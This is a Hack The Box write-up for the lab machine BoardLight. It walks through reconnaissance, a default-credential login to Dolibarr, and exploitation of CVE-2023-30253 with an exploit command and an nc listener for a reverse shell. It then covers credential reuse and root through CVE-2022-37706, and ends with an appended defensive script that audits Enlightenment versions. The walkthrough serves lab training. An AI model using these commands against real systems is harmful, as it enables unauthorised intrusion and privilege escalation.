BoardLight [HTB] — Writeup

So, I started working on HTB again after a small break and came across the machine BoardLight.

Upon firing up the machine, I used nmap to check for active ports:

nmap -sV -sC -A 10.10.11.11

[Image: nmap output]

This revealed two open ports: Port 22 and Port 80. At the bottom of the webpage I noticed the domain board.htb and added it to /etc/hosts. I then tried vhost enumeration:

gobuster vhost -u http://board.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

[Image: gobuster vhost results showing crm.board.htb]

This returned crm.board.htb — a Dolibarr 17.0.0 CRM.

[Image: Dolibarr login page]

Default credentials admin/admin got me in.

[Image: Dolibarr dashboard after login]

Exploiting CVE-2023-30253

Dolibarr prior to 17.0.1 is vulnerable to RCE. I found a PoC on GitHub and ran it:

python3 exploit.py http://crm.board.htb admin admin 10.10.14.28 443
nc -lvnp 443

[Image: exploit running and reverse shell obtained]

Got a shell. Found a user larissa in /home but couldn’t access it directly.

[Image: permission denied accessing larissa folder]

Tried changing permissions but that didn’t work either.

[Image: chown operation not permitted]

Credential Discovery

Searched Dolibarr’s conf/conf.php and found database credentials.

[Image: credentials found in conf.php]

Used them to SSH in as larissa and grabbed the user flag.

[Image: larissa shell with user flag]

Privilege Escalation via CVE-2022-37706

Tried sudo -l but no luck.

[Image: sudo -l showing no permissions]

Ran LinPEAS which flagged Enlightenment below version 0.25.4 — vulnerable to RCE via CVE-2022-37706.

[Image: linpeas output highlighting CVE-2022-37706]

Ran the PoC exploit and got root.

[Image: root shell obtained]
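
A defender-side check for the condition LinPEAS flagged above, as an added example that is not part of the original writeup: it reports a host as exposed when the installed Enlightenment version is below 0.25.4 and a setuid helper from the package is present (the public CVE-2022-37706 description attributes the issue to the setuid-root enlightenment_sys binary). The 0.25.4 threshold comes from the writeup; the `enlightenment*` file-name pattern, the `/usr/lib` search root and the Debian package name are assumptions.

```shell
#!/bin/sh
# Added example (not from the writeup): audit a host for the Enlightenment
# condition flagged by LinPEAS. The threshold 0.25.4 is taken from the writeup.
FIXED_VERSION="0.25.4"

# upstream_version V: strip a Debian epoch ("1:") and revision ("-4"), if any.
upstream_version() {
    printf '%s\n' "$1" | sed -e 's/^[0-9]*://' -e 's/-[^-]*$//'
}

# version_lt A B: succeed when A is strictly lower than B (needs sort -V).
version_lt() {
    [ "$1" != "$2" ] &&
        [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# setuid_helpers DIR: list setuid files under DIR named enlightenment*.
# The name pattern is an assumption; adjust it to the package's file list.
setuid_helpers() {
    find "$1" -xdev -type f -perm -4000 -name 'enlightenment*' 2>/dev/null || true
}

# audit_enlightenment VERSION DIR: print a verdict; return 1 when exposed.
audit_enlightenment() {
    ver=$(upstream_version "$1")
    helpers=$(setuid_helpers "$2")
    if ! version_lt "$ver" "$FIXED_VERSION"; then
        echo "OK: enlightenment $ver is at or above $FIXED_VERSION"
        return 0
    fi
    if [ -z "$helpers" ]; then
        echo "NOTE: enlightenment $ver is below $FIXED_VERSION, no setuid helper under $2"
        return 0
    fi
    echo "EXPOSED: enlightenment $ver is below $FIXED_VERSION with setuid helpers:"
    echo "$helpers"
    return 1
}

# Live use on a Debian-family host (assumed package name "enlightenment"):
#   audit_enlightenment "$(dpkg-query -W -f='${Version}' enlightenment)" /usr/lib
```

Upgrading the package to 0.25.4 or later, or removing it where no desktop session is needed, clears the finding.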